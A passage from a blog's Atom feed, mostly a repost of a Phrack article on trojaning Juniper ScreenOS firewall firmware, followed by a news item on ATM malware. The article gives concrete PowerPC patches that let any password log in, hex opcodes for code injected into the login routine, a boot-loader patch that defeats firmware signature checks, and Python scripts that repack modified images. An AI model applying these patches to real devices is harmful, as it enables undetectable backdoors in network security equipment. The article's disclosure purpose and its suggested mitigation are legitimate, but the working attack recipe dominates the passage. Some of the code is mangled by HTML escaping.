bl    COMPARE_HASHES   # does a string compare 003F7F10  cmpwi %r3, 0                # equal if match 003F7F14  bne   loc_3F7F24    # login fails if not equal (branch) 003F7F18  li    %r0, 2 003F7F1C  stw   %r0, 0(%r29) 003F7F20  b     loc_3F7F28   If we replace   003F7F10  cmpwi %r3, 0  # equal if match  with   0x397F30 cmpwi %r3, 1           # equal if they don't match  then any password EXCEPT a valid password will provide a login.  We could patch   003F7F14 bne   loc_3F7F24   # login fails if not equal (branch)  to   003F7F14 bl   loc_3F7F24   # login never fails (branch)  to allow any password with a valid username to work.   Infection [ Payload ]  The last step for our working trojan is to be able to inject code into the firmware. First we need to find somewhere to inject the code we want executed. The ScreenOS code section contains a block of nulls large enough to include useful functionality at address 0x0031b4ac to 0x0031b4b0  First we write our desired functionality in PowerPC assembly and replace a chunk of nulls with the hex values of the assembly opcodes.  The steps to execute this code are: - Patch a branch in ScreenOS to call our code - Run our injected code which can potentially call ScreenOS functions - Branch back to callee  This code can be injected at address 0x002BB4E0 in the firmware and called from the login function of ScreenOS:   003F7F04 mr      %r4, %r27      003F7F08 mr      %r5, %r30 003F7F0C bl      GET_HASHED_PASS # patch this to call our code 003F7F10 cmpwi   %r3, 0          003F7F14 bne     loc_3F7F24 003F7F18 li      %r0, 2 003F7F1C stw     %r0, 0(%r29) 003F7F20 b       loc_3F7F28  so  003f7f0c bl GET_HASHED_PASS  becomes  003f7f0c bl 0x31b4c0  which will jump to the location containing the injected code.  To inject code the PowerPC architecture features such as flat memory model, fixed width 4 byte instructions and the link register make this fairly straightforward to implement. A very simple proof of concept example, which prints out a string to the console on every login, is provided below:  stwu  %sp,  -0x20(%sp) # reserve some stack space mflr  %r0   # minimal function prolog lis   %r3,  string_msb_address # load half of string addi  %r3,  %r3,  string_lsb_address  # load second half of string bl    Print_To_Console # call ScreenOS function mtlr  %r0   addi  %sp, 0x20  #minimal function epilog bl    callee_function  # branch back to calling function  As PowerPC has a fix instruction size of 4 bytes to load a 4 byte string we need two instructions. The first loads the most significant bytes - 2 bytes for load instruction into register and 2 bytes of string, the second adds the least significant bytes to the register to give us 4 byte string.  This asssembly is then translated in hex and patched into the firmware using a hex editor at absolute address 0x002bb4e0 overwriting existing nulls bytes:  0x002bb4b0: 93DFCAC4 4BD48E69 80010014 7C0803A6 0x002bb4c0: 83C10008 83E1000C 38210010 4E800020 0x002bb4d0: 00000000 00000000 00000000 00000000 0x002bb4e0: 9421FFE0 7C0802A6 3C6000C4 386321BC &lt;---- 0x002bb4f0: 488ED7E9 60630001 7C0803A6 38210020 injected code 0x002bb500: 480DCA31 00000000 00000000 00000000 -&gt;&lt;br /&gt;0x002bb510: 00000000 00000000 00000000 00000000&lt;br /&gt;&lt;br /&gt;From reverse engineering we have identified a ScreenOS function which&lt;br /&gt;prints strings to the console. So here we have new functionality injected&lt;br /&gt;into the ScreenOS firmware which has new code but also calls builtin&lt;br /&gt;ScreenOS functionality. The string loaded can be one already existing in&lt;br /&gt;ScreenOS or a new one injected somewhere into the null byte area.&lt;br /&gt;&lt;br /&gt;Every time a user logins the string will be output to the serial console.&lt;br /&gt;&lt;br /&gt;--[ 0x9 - Zombie Loader&lt;br /&gt;&lt;br /&gt;ScreenOS does include a facility to validate firmware images and all&lt;br /&gt;Juniper firmware images are signed. Crucially though the validating&lt;br /&gt;certificate is NOT installed by default on any Netscreen AND anyone with&lt;br /&gt;administrator rights can delete and install the certifcate. To enable&lt;br /&gt;firmware image authentication it is necessary to obtain the certificate&lt;br /&gt;from the Juniper website and then upload the certificate to the device&lt;br /&gt;using the following command:&lt;br /&gt;&lt;br /&gt;save image-key tftp 129.168.0.40 image-key.cer&lt;br /&gt;&lt;br /&gt;In the example above image-key is the certificate to be uploaded from the&lt;br /&gt;tftp server with IP address 192.168.0.40. Note the insecure transport&lt;br /&gt;mechanism for a cryptographic key. This is vulnerable to a man in the&lt;br /&gt;middle attack.&lt;br /&gt;&lt;br /&gt;The firmware authentication check code is present in the boot loader which&lt;br /&gt;we can modify to authenticate all firmware images or only non-Juniper&lt;br /&gt;images. It may also be possible to sign firmware with our own certificate&lt;br /&gt;and upload this to the Netscreen to be used for validation.&lt;br /&gt;&lt;br /&gt;Patching the Boot Loader to bypass certificate authentication.&lt;br /&gt;To bypass the firmware authentication check only one branch instruction&lt;br /&gt;needs to be patched:&lt;br /&gt;&lt;br /&gt;beq -&gt; bl   0x4182001C -&gt; 0x4800001C&lt;br /&gt;&lt;br /&gt;0000D68C  bl      sub_98B8&lt;br /&gt;0000D690  cmpwi   %r3, 0      # %r3 has result of image validation&lt;br /&gt;0000D694  beq     loc_D6B0    # branch if passed&lt;br /&gt;0000D698  lis     %r3, aBogusImageNotA@h  # image not authenticated&lt;br /&gt;0000D69C  addi    %r3, %r3, aBogusImageNotA@l&lt;br /&gt;0000D6A0  crclr   4*cr1+eq&lt;br /&gt;0000D6A4  bl      sub_C8D0&lt;br /&gt;0000D6A8  li      %r31, -1&lt;br /&gt;0000D6AC  b       loc_D6E0&lt;br /&gt;&lt;br /&gt;If we replace&lt;br /&gt;&lt;br /&gt;0000D694  beq     loc_D6B0    # branch if passed&lt;br /&gt;&lt;br /&gt;with&lt;br /&gt;&lt;br /&gt;0000D694 bl      loc_D6B0    # always branch, all images authenticated&lt;br /&gt;&lt;br /&gt;or this&lt;br /&gt;&lt;br /&gt;0000D694 bne     loc_D6B0    # evil...only bogus images authenticated&lt;br /&gt;&lt;br /&gt;we can successfully load modified firmware even if a Juniper certificate&lt;br /&gt;is installed on the device. The boot loader is automatically upgraded when&lt;br /&gt;an image is loaded if the new boot loader differs from the existing.&lt;br /&gt;&lt;br /&gt;In summary the steps to bypass firmware authentication are:&lt;br /&gt;&lt;br /&gt;1. Delete certificate if one has been uploaded using the command:&lt;br /&gt;&lt;br /&gt;ns5xt&gt;delete crypto auth-key&lt;br /&gt;&lt;br /&gt;2. Upload the modified firmware image including modified boot loader.&lt;br /&gt;&lt;br /&gt;3. Upload the certificate using:&lt;br /&gt;&lt;br /&gt;ns5xt&gt;save image-key tftp 192.168.0.21 imagekey.cer&lt;br /&gt;&lt;br /&gt;--[ 0xA - 28 Hacks Later&lt;br /&gt;&lt;br /&gt;A more useful trojaned firmware can perform numerous functions leveraging&lt;br /&gt;existing ScreenOS functionality such as&lt;br /&gt;- loading a hidden shadow configuration file&lt;br /&gt;- allowing all traffic from one IP through the Netscreen to the network&lt;br /&gt;- a network traffic tap&lt;br /&gt;- persistent infection via boot loader on a firmware upgrade&lt;br /&gt;- client side attacks against Administrators via Javascript code injection&lt;br /&gt;into the web console&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0xB - Closing Scene&lt;br /&gt;&lt;br /&gt;If unauthorised access is gained to a device running ScreenOS it is&lt;br /&gt;possible for an attacker to replace the boot loader and operating system&lt;br /&gt;with a modified version which is undetectable except by off line&lt;br /&gt;comparison with a known image.&lt;br /&gt;&lt;br /&gt;Juniper in-memory infection.&lt;br /&gt;&lt;br /&gt;A very stealthy attack is also possible due to a feature of ScreenOS. When&lt;br /&gt;loading a firmware over serial console two options are provided:&lt;br /&gt;1. Save firmware to flash and then run new firmware.&lt;br /&gt;2. Just run new firmware without saving to flash.&lt;br /&gt;&lt;br /&gt;In the second case the modified firmware will be wiped on reboot and the&lt;br /&gt;previously stored firmware will be run. After a reboot no trace of the&lt;br /&gt;modified firmware will be left.&lt;br /&gt;&lt;br /&gt;These attacks are straightforward for an attacker anywhere in the supply&lt;br /&gt;chain (ie vendors. manufacturers) or someone with physical access (ie&lt;br /&gt;third party support). If an administrator uses TFTP or HTTP to upgrade a&lt;br /&gt;Netscreen it is also possible to conduct a man-in-the-middle attack and&lt;br /&gt;replace the firmware being uploaded with a modified version on the wire.&lt;br /&gt;&lt;br /&gt;These attacks could be prevented by Juniper pre-installing a certificate&lt;br /&gt;for image authentication which can not be deleted or modified.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0xC - References&lt;br /&gt;&lt;br /&gt;- Juniper JTAC Bulletin PSN-2008-11-111&lt;br /&gt;ScreenOS Firmware Image Authenticity Notification&lt;br /&gt;"All Juniper ScreenOS Firewall Platforms are susceptible to&lt;br /&gt;circumstances in which a maliciously modified ScreenOS image can&lt;br /&gt;be installed."&lt;br /&gt;&lt;br /&gt;http://www.securelink.nl/nl/x/123/ScreenOS-Firmware-Image-Authenticity-&lt;br /&gt;Notification&lt;br /&gt;&lt;br /&gt;--[ 0xD - Credits&lt;br /&gt;George Romero, antic0de, the belgian, hawkes, zadig, lenny, mark, andy,&lt;br /&gt;ruxcon, kiwicon, +Mammon, +Orc&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[ 0xE Adddendum:&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;~/.gdbinit for remote PowerPC debugging&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;#--------------remote connect command over USB serial link-----------------&lt;br /&gt;define netscreen&lt;br /&gt;set height 0&lt;br /&gt;set logging on&lt;br /&gt;target remote /dev/ttyUSB0&lt;br /&gt;end&lt;br /&gt;#--------------------breakpoint aliases------------------------------------&lt;br /&gt;define bpl&lt;br /&gt;info breakpoints&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define bpc&lt;br /&gt;clear $arg0&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define bpe&lt;br /&gt;enable $arg0&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define bpd&lt;br /&gt;disable $arg0&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;#--------------------process information-----------------------------------&lt;br /&gt;define stack&lt;br /&gt;info stack&lt;br /&gt;info frame&lt;br /&gt;info args&lt;br /&gt;info locals&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define reg&lt;br /&gt;  printf " r00:%08X r01:%08X r02:%08X r03:%08X", $r0, $r1, $r2, $r3&lt;br /&gt;  printf " \t pc:%08X\n", $pc&lt;br /&gt;  printf " r04:%08X r05:%08X r06:%08X r07:%08X\n", $r4, $r5, $r6, $r7&lt;br /&gt;  printf " r08:%08X r09:%08X r10:%08X r11:%08X", $r8, $r9, $r10, $r11&lt;br /&gt;  printf " \t lr:%08X\n", $lr&lt;br /&gt;  printf " r12:%08X r13:%08X r14:%08X r15:%08X\n", $r12, $r13, $r14, $r15&lt;br /&gt;  printf " r16:%08X r17:%08X r18:%08X r19:%08X", $r16, $r17, $r18, $r19&lt;br /&gt;  printf " \tctr:%08X\n", $ctr&lt;br /&gt;  printf " r20:%08X r21:%08X r22:%08X r23:%08X\n", $r20, $r21, $r22, $r23&lt;br /&gt;  printf " r24:%08X r25:%08X r26:%08X r27:%08X", $r24, $r25, $r26, $r27&lt;br /&gt;  printf " \t cr:%08X\n",$cr&lt;br /&gt;  printf " r28:%08X r29:%08X r30:%08X r31:%08X", $r28, $r29, $r30, $r31&lt;br /&gt;  printf " \txer:%08X\n", $xer&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define func&lt;br /&gt;info functions&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define var&lt;br /&gt;info variables&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define lib&lt;br /&gt;info sharedlibrary&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define sig&lt;br /&gt;info signals&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define threadice&lt;br /&gt;info threads&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define u&lt;br /&gt;info udot&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define dis&lt;br /&gt;disassemble $arg0&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#------------------------------hex/ascii dump address----------------------&lt;br /&gt;define hexdump&lt;br /&gt;  printf "%08X : ", $arg0&lt;br /&gt;  printf "%02X %02X %02X %02X  %02X %02X %02X %02X", *(unsigned char*) /&lt;br /&gt;($arg0), *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /&lt;br /&gt;*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), *(unsigned char*)/&lt;br /&gt;($arg0 + 5),*(unsigned char*)($arg0+6), *(unsigned char*)($arg0 + 7)&lt;br /&gt;  printf " - "&lt;br /&gt;  printf "%02X %02X %02X %02X  %02X %02X %02X %02X",*(unsigned char*) /&lt;br /&gt;($arg0+8), *(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10), /&lt;br /&gt;*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12), /&lt;br /&gt;*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14), /&lt;br /&gt;*(unsigned char*)($arg0 + 15)&lt;br /&gt;  printf " %c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c\n",*(unsigned char*)($arg0),/&lt;br /&gt;*(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /&lt;br /&gt;*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), /&lt;br /&gt;*(unsigned char*)($arg0 + 5),*(unsigned char*)($arg0+6), /&lt;br /&gt;*(unsigned char*)($arg0 + 7),*(unsigned char*)($arg0+8), /&lt;br /&gt;*(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10),/&lt;br /&gt;*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12), /&lt;br /&gt;*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14), /&lt;br /&gt;*(unsigned char*)($arg0 + 15)&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;#------------------------------hex dump address---------------------------&lt;br /&gt;define memdump&lt;br /&gt;printf "%02X%02X%02X%02X%02X%02X%02X%02X", *(unsigned char*)/&lt;br /&gt;($arg0), *(unsigned char*)($arg0 + 1),*(unsigned char*)($arg0+2), /&lt;br /&gt;*(unsigned char*)($arg0 + 3),*(unsigned char*)($arg0+4), /&lt;br /&gt;*(unsigned char*)($arg0 + 5),*(unsigned char*)($arg0+6), /&lt;br /&gt;*(unsigned char*)($arg0 + 7)&lt;br /&gt;  printf "%02X%02X%02X%02X%02X%02X%02X%02X\n",*(unsigned char*)/&lt;br /&gt;($arg0+8), *(unsigned char*)($arg0 + 9),*(unsigned char*)($arg0+10),/&lt;br /&gt;*(unsigned char*)($arg0 + 11),*(unsigned char*)($arg0+12),/&lt;br /&gt;*(unsigned char*)($arg0 + 13),*(unsigned char*)($arg0+14),/&lt;br /&gt;*(unsigned char*)($arg0 + 15)&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#----------------------------process context-------------------------------&lt;br /&gt;define context&lt;br /&gt;printf "\n"&lt;br /&gt;printf "powerpc\n"&lt;br /&gt;printf "---------------------------------"&lt;br /&gt;printf "--------------------------------------[regs]\n"&lt;br /&gt;reg&lt;br /&gt;printf "\n"&lt;br /&gt;printf "[%08X]---------------------", $r1&lt;br /&gt;printf "--------------------------------------[stack]\n"&lt;br /&gt;hexdump $r1+64&lt;br /&gt;hexdump $r1+48&lt;br /&gt;hexdump $r1+32&lt;br /&gt;hexdump $r1+16&lt;br /&gt;hexdump $r1&lt;br /&gt;hexdump $r1-16&lt;br /&gt;hexdump $r1-32&lt;br /&gt;hexdump $r1-48&lt;br /&gt;hexdump $r1-64&lt;br /&gt;printf "\n"&lt;br /&gt;printf "[%08X]---------------------", $pc&lt;br /&gt;printf "----------------------------------[code]\n"&lt;br /&gt;x /16i $pc&lt;br /&gt;printf "---------------------------------"&lt;br /&gt;printf "-------------------------------------\n"&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#--------------------------process control---------------------------------&lt;br /&gt;define n&lt;br /&gt;  ni&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define c&lt;br /&gt;  continue&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define go&lt;br /&gt;  stepi $arg0&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define goto&lt;br /&gt;  tbreak $arg0&lt;br /&gt;  continue&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define pret&lt;br /&gt;  finish&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define startice&lt;br /&gt;  tbreak _start&lt;br /&gt;  r&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define main&lt;br /&gt;  tbreak main&lt;br /&gt;  r&lt;br /&gt;  context&lt;br /&gt;end&lt;br /&gt;&lt;br /&gt;define find&lt;br /&gt;  set $start = (char *) $arg0&lt;br /&gt;  set $end = (char *) $arg1&lt;br /&gt;  set $pattern = (int) $arg2&lt;br /&gt;  set $p = $start&lt;br /&gt;  while $p &lt; $end  if (*(int *) $p) == $pattern      printf "pattern 0x%x found at 0x$x\n", $pattern, $p  end     set $p++    end end  #--------------------------gdb options------------------------------------- set confirm 0 set verbose off set prompt gdb-ppc&gt;&lt;br /&gt;set output-radix 0x10&lt;br /&gt;set input-radix 0x10&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;ScreenOS pack &amp;amp; unpack python scripts&lt;br /&gt;---------------------------------------------------------------------------&lt;br /&gt;#!/usr/local/bin/python&lt;br /&gt;#&lt;br /&gt;# nodunpack.py :: ScreenOS image unpacker&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# IMPORTANT:&lt;br /&gt;# requires LZMA utilities&lt;br /&gt;#&lt;br /&gt;import sys&lt;br /&gt;import subprocess&lt;br /&gt;&lt;br /&gt;class sosunzip:&lt;br /&gt;&lt;br /&gt;  def init():&lt;br /&gt;      self.header&lt;br /&gt;      self.image&lt;br /&gt;      self.packed&lt;br /&gt;self.out&lt;br /&gt;&lt;br /&gt;  def unpack(self):&lt;br /&gt;&lt;br /&gt;print "Cutting off header and saving"&lt;br /&gt;f = open(self.packed, 'rb')&lt;br /&gt;fh = file(self.header, 'w+b')&lt;br /&gt;fb = file(self.image, 'w+b')&lt;br /&gt;&lt;br /&gt;# save header including 4 magic bytes for lzma blob&lt;br /&gt;head = f.read(0x00012c04)&lt;br /&gt;fh.write(head)&lt;br /&gt;fh.close()&lt;br /&gt;print "Header extracted"&lt;br /&gt;&lt;br /&gt;# save lzma blob&lt;br /&gt;f.seek(0x00012c04)&lt;br /&gt;blob = f.read()&lt;br /&gt;fb.write(blob)&lt;br /&gt;f.close()&lt;br /&gt;fb.close()&lt;br /&gt;print "lzma blob extracted"&lt;br /&gt;&lt;br /&gt;# fast way&lt;br /&gt;# fb = open(self.image, 'r+b')&lt;br /&gt;# buf = fb.read().replace(oldhead,newhead)&lt;br /&gt;# fb.seek(0x0)&lt;br /&gt;# fb.write(buf)&lt;br /&gt;# fb.close()&lt;br /&gt;&lt;br /&gt;# correct dictionary size&lt;br /&gt;fb = open(self.image, 'r+b')&lt;br /&gt;fb.seek(0x01)&lt;br /&gt;print "Correcting dictionary size 00008000"&lt;br /&gt;fb.write(chr(0x00) + chr(0x00) + chr(0x80) + chr(0x00))&lt;br /&gt;&lt;br /&gt;# read header and lzma blob&lt;br /&gt;fb.seek(0x0)&lt;br /&gt;head = fb.read(0x05)&lt;br /&gt;fb.seek(0x05)&lt;br /&gt;lzma = fb.read()&lt;br /&gt;&lt;br /&gt;# write outheader, unknown size and lzma blob&lt;br /&gt;fb.seek(0x00)&lt;br /&gt;fb.write(head)&lt;br /&gt;print "Adding uncompressed size: 0xffffffffffffffff"&lt;br /&gt;fb.write(chr(0xff)+chr(0xff)+chr(0xff)+chr(0xff)+chr(0xff)+chr /&lt;br /&gt;     (0xff)+chr(0xff)+chr(0xff))&lt;br /&gt;fb.write(lzma)&lt;br /&gt;fb.close()&lt;br /&gt;&lt;br /&gt;print ("Uncompressing LZMA blob...")&lt;br /&gt;mkimage = "".join(['lzcat ',self.image,' &gt; ',self.out])&lt;br /&gt;subprocess.call(mkimage, shell=True)&lt;br /&gt;print "lzcat: Blob decompressed (decoder error is safe to ignore)"&lt;br /&gt;print "ScreenOS image file decompressed"&lt;br /&gt;&lt;br /&gt;if __name__ == '__main__':&lt;br /&gt;&lt;br /&gt;  if len(sys.argv) != 4:&lt;br /&gt;print "Usage: ./sunpack.py &lt;packed-image&gt; &lt;out-header&gt; &lt;out-image&gt;"&lt;br /&gt;sys.exit(1)&lt;br /&gt;  else:&lt;br /&gt;s = sosunzip()&lt;br /&gt;s.packed = sys.argv[1]&lt;br /&gt;s.header = sys.argv[2]&lt;br /&gt;s.out = sys.argv[3]&lt;br /&gt;s.image = "".join([sys.argv[3],'.lzma']) &lt;br /&gt;s.unpack()&lt;br /&gt;&lt;br /&gt;  sys.exit(0)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/local/bin/python&lt;br /&gt;#&lt;br /&gt;# nodpack.py :: ScreenOS image packer&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# IMPORTANT:&lt;br /&gt;# requires LZMA utilities installed!&lt;br /&gt;#&lt;br /&gt;import sys&lt;br /&gt;import subprocess&lt;br /&gt;&lt;br /&gt;class soszip:&lt;br /&gt;&lt;br /&gt;  def init():&lt;br /&gt;      self.header&lt;br /&gt;      self.image&lt;br /&gt;      self.packed&lt;br /&gt;&lt;br /&gt;  def pack(self):&lt;br /&gt;&lt;br /&gt;print ("Compressing with LZMA...")&lt;br /&gt;mklzma = "".join(["lzma", " -5 ",self.image])&lt;br /&gt;subprocess.call(mklzma,shell=True)&lt;br /&gt;&lt;br /&gt;print("Adding header to LZMA blob...")&lt;br /&gt;mkimage = "".join(['cat ',self.header,' ',self.image,'.lzma &gt; /&lt;br /&gt;      ',self.packed])&lt;br /&gt;subprocess.call(mkimage, shell=True)&lt;br /&gt;&lt;br /&gt;print "Fixing dictionary size 0x00012c05: 00008000 -&gt; 00200000"&lt;br /&gt;f = open(self.packed, 'r+b')&lt;br /&gt;f.seek(0x00012c05)&lt;br /&gt;f.write(chr(0x00)+ chr(0x20) + chr(0x00)+ chr(0x00))&lt;br /&gt;#seek to start of file&lt;br /&gt;f.seek(0x0)&lt;br /&gt;head = f.read(0x00012c09)&lt;br /&gt;print "Removing uncompressed size 0x00012c09: [8 bytes]"&lt;br /&gt;#seek past the field to remove&lt;br /&gt;f.seek(0x00012c11)&lt;br /&gt;bub = f.read()&lt;br /&gt;# rewrite the file&lt;br /&gt;f.seek(0x0)&lt;br /&gt;f.write(head)&lt;br /&gt;f.write(bub)&lt;br /&gt;f.truncate()&lt;br /&gt;f.close()&lt;br /&gt;&lt;br /&gt;print "ScreenOS image file created"&lt;br /&gt;&lt;br /&gt;if __name__ == '__main__':&lt;br /&gt;&lt;br /&gt;  if len(sys.argv) != 4:&lt;br /&gt;print "Usage: ./nodpack.py &lt;header&gt; &lt;img src="" /&gt; &lt;screenos-image&gt;"&lt;br /&gt;sys.exit(1)&lt;br /&gt;  else:&lt;br /&gt;s = soszip()&lt;br /&gt;s.header = sys.argv[1]&lt;br /&gt;s.image = sys.argv[2]&lt;br /&gt;s.packed = sys.argv[3] &lt;br /&gt;s.pack()&lt;br /&gt;&lt;br /&gt;  sys.exit(0)&lt;br /&gt;&lt;br /&gt;--------[ EOF&lt;br /&gt;&lt;br /&gt;source: &lt;a href="http://www.phrack.org/issues.html?issue=66&amp;amp;id=5#article"&gt;phrack&lt;/a&gt;&lt;br /&gt;&lt;/screenos-image&gt;&lt;/header&gt;&lt;/out-image&gt;&lt;/out-header&gt;&lt;/packed-image&gt;&lt;/http:&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-7881801400907622347?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/7881801400907622347/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=7881801400907622347' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7881801400907622347'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/7881801400907622347'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/07/my-favorite-article-of-year-so-far.html' title='My favorite article of the year so far.'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-1490192263942102117</id><published>2009-06-05T10:22:00.002+08:00</published><updated>2009-06-05T10:25:55.169+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security'/><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title type='text'>Windows XP ATM's Under Hacker Attacks</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_zPPJaS3LoQM/SiiB_akhpCI/AAAAAAAAAoA/8tVnZ6We08k/s1600-h/atmmachine.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px; height: 150px;" src="http://1.bp.blogspot.com/_zPPJaS3LoQM/SiiB_akhpCI/AAAAAAAAAoA/8tVnZ6We08k/s200/atmmachine.jpg" alt="" id="BLOGGER_PHOTO_ID_5343663884339356706" border="0" /&gt;&lt;/a&gt;&lt;strong&gt;There have been approximately 20 ATM's in Eastern Europe that have been compromised. These attacks are in the early stages of development and would probably gain momentum and even spread to US ATM machines.&lt;br /&gt;&lt;br /&gt;&lt;/strong&gt;&lt;p&gt;A security outfit, TrustWave's SpiderLabs performed the analysis of malware found installed on compromised ATMs in the Eastern European region. The ATM's that were compromised ran Microsoft Windows XP. The malware captures magnetic stripe data and PIN codes from the private memory space of transaction-processing applications installed on infected ATM.&lt;/p&gt; &lt;p&gt;The attacker can gain full control of the infected ATM through a customized user interface built into the malware. This is accomplished by inserting a controller card into the ATM's reader. &lt;/p&gt; &lt;p&gt;TrustWave's analyses don't believe the malware has networking functionality that would send data to other, remote locations over the Internet. The malware would output the harvested data through the ATM's receipt printer or write the data to a storage device inserted into the ATM's &lt;a href="http://www.physorg.com/tags/card+reader/" rel="tag" class="textTag"&gt;card reader&lt;/a&gt;.&lt;/p&gt; &lt;p&gt;TrustWave stated; "this malware is unlike any we have ever had experience with. It allows the attacker to gain complete control over the ATM to obtain track data, Pins and cash from each infected machine." &lt;/p&gt; &lt;p&gt;"We believe the current attack vector is an early version of the malware sample, and future attacks will add functionality such as propagation via the ATM network. If an attacker can gain access to one machine, the malware will evolve and propagate automatically to other systems."&lt;/p&gt; &lt;p&gt;A dropper file named isadmin.exe, is installed into the ATM and executed within the C:\WINDOWS directory of the compromised machine. The malware then proceeds to control the Protected Storage service that would handle the original lsass.exe executable file, located in the C:\WINDOWS\system32 directory, to point to the infected file.&lt;/p&gt; &lt;p&gt;The malware is designed to remain active in the event the ATM crashes and has to restart.&lt;/p&gt;source: &lt;a href="http://www.physorg.com/news163328974.html"&gt;physorg&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7306732139129025494-1490192263942102117?l=shaolininteger.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://shaolininteger.blogspot.com/feeds/1490192263942102117/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=7306732139129025494&amp;postID=1490192263942102117' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1490192263942102117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7306732139129025494/posts/default/1490192263942102117'/><link rel='alternate' type='text/html' href='http://shaolininteger.blogspot.com/2009/06/windows-xp-atms-under-hacker-attacks.html' title='Windows XP ATM&apos;s Under Hacker Attacks'/><author><name>Slash The Underground</name><uri>http://www.blogger.com/profile/11809812496786804883</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://1.bp.blogspot.com/_zPPJaS3LoQM/SYlLqQUM6OI/AAAAAAAAAlo/gG3dNEYX_Dc/S220/17012009021.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_zPPJaS3LoQM/SiiB_akhpCI/AAAAAAAAAoA/8tVnZ6We08k/s72-c/atmmachine.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7306732139129025494.post-5584908831753882846</id><published>2009-05-14T21:26:00.006+08:00</published><updated>2009-05-16T14:27:01.074+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='uDc'/><title type='text'>svn metasploit on windows</title><content type='html'>&lt;a style="" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_zPPJaS3LoQM/SgwjCDNDqsI/AAAAAAAAAn4/yUUhvXkc5KY/s1600-h/metasploit-hax_small.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 167px; height: 200px;" src="http://2.bp.blogspot.com/_zPPJaS3LoQM/SgwjCDNDqsI/AAAAAAAAAn4/yUUhvXkc5KY/s200/metasploit-hax_small.jpg" alt="" 